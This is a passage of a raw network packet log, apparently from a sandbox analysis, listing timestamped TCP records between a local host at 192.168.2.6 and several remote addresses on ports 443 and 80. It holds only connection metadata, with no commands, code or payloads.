                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.685796022 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.685831070 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.685831070 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.693226099 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.693247080 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.693370104 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.693370104 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.693397999 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.693516970 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.694348097 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.694427967 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.694468021 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.694468021 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.696374893 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:14.305054903 CET4434975420.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:14.305126905 CET49754443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:06:14.308170080 CET49754443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:06:14.308191061 CET4434975420.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:14.308505058 CET4434975420.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.326674938 CET49772443192.168.2.6162.159.61.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.344717979 CET44349773172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.345016956 CET49773443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.345058918 CET44349773172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.346237898 CET44349773172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.346302986 CET49773443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.347306013 CET49773443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.347325087 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.347372055 CET44349773172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.371335983 CET44349772162.159.61.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.371999025 CET49772443192.168.2.6162.159.61.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.372013092 CET44349772162.159.61.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.418867111 CET49773443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.418895006 CET44349773172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.421478987 CET44349774172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.424401999 CET49774443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.424418926 CET44349774172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.426011086 CET44349774172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.426449060 CET49774443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.427974939 CET49774443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.428031921 CET49774443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.428144932 CET44349774172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.443202972 CET44349767142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.443511963 CET49767443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.443542004 CET44349767142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.443902969 CET44349767142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.443917990 CET44349767142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.444616079 CET44349767142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.445662975 CET49767443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.445683002 CET44349767142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.445692062 CET49767443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.447993040 CET49773443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.448077917 CET44349773172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.448158026 CET49773443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.448328018 CET49767443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.448385000 CET44349767142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.448489904 CET44349767142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.449155092 CET49767443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.449155092 CET49767443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.449214935 CET49763443192.168.2.6104.116.245.121
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.449292898 CET44349763104.116.245.121192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.449469090 CET44349763104.116.245.121192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.449512959 CET49763443192.168.2.6104.116.245.121
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.449512959 CET49763443192.168.2.6104.116.245.121
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.452673912 CET49780443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.452709913 CET44349780172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.452775955 CET49780443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.452873945 CET49781443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.452902079 CET44349781172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.453025103 CET49780443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.453036070 CET44349780172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.453042984 CET49781443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.453217983 CET49781443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.453228951 CET44349781172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.575113058 CET49772443192.168.2.6162.159.61.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.578012943 CET49774443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.578027010 CET44349774172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.589942932 CET49772443192.168.2.6162.159.61.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.590029955 CET44349772162.159.61.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.590075970 CET49772443192.168.2.6162.159.61.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.590748072 CET49774443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.590837002 CET44349774172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.590950012 CET49774443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667284966 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667324066 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667337894 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667346954 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667381048 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667392015 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667444944 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668493986 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668524027 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668544054 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668554068 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668565035 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668574095 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668615103 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.765666008 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.765718937 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.765886068 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766021967 CET49784443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766051054 CET44349784172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766096115 CET49784443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766189098 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766227007 CET44349785172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766282082 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766443014 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766459942 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766581059 CET49784443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766591072 CET44349784172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766715050 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766726017 CET44349785172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.767934084 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.767987013 CET44349783172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.768484116 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.768484116 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.768527031 CET44349783172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.835608959 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.837295055 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.837342024 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.249598980 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.249619007 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.249667883 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.249672890 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.249713898 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.256740093 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.256767988 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.256803036 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.256808043 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.256856918 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.258027077 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.258070946 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.258131027 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.260307074 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.261308908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.261354923 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.262053013 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.262069941 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.262110949 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.262115955 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.262161016 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.265650988 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.265686989 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.265742064 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268378019 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268399000 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268445015 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268455029 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268487930 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268507957 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.269171953 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.270016909 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.270241022 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.273546934 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.273582935 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.273699999 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276441097 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276473999 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276520014 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276527882 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276565075 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276585102 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.277452946 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.277972937 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.278032064 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281693935 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281723022 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281770945 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281796932 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281829119 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281842947 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.282613039 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.283392906 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.283442974 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.287911892 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.287950039 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.288062096 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289772987 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289805889 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289858103 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289865017 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289905071 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289925098 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.292443037 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.292480946 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.292526007 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294363022 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294380903 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294445038 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294466019 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294495106 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294509888 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.295927048 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.296756029 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.296880960 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.298580885 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.298616886 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.298669100 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300451040 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300472975 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300520897 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300527096 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300560951 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300580025 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.301258087 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.301294088 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.301367998 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.303399086 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.303663015 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.304071903 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.308074951 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.308578014 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.308695078 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.312748909 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.312968016 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.313002110 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.317780018 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.395502090 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.395529032 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.396666050 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.498297930 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.502342939 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.502963066 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.503026962 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.506154060 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.506372929 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.506424904 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.510526896 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.510564089 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.510665894 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.514579058 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.514681101 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.514734030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.518573999 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.518791914 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.518841028 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.522839069 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.522917032 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.522967100 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.526966095 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.527095079 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.527146101 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.531260014 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.531301975 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.531409979 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.536346912 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.536364079 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.536410093 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.539254904 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.539402008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.539561033 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.543365002 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.543628931 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.543679953 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.547548056 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.547864914 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.547919989 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.551728010 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.551907063 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.551956892 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.555908918 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.556199074 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.556313992 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.560153008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.560270071 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.560326099 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.564692020 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.583374023 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.583403111 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.583472967 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.583502054 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.583821058 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597055912 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597115040 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597150087 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597167015 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597201109 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597222090 CET49734443192.168.2.6150.171.28.10
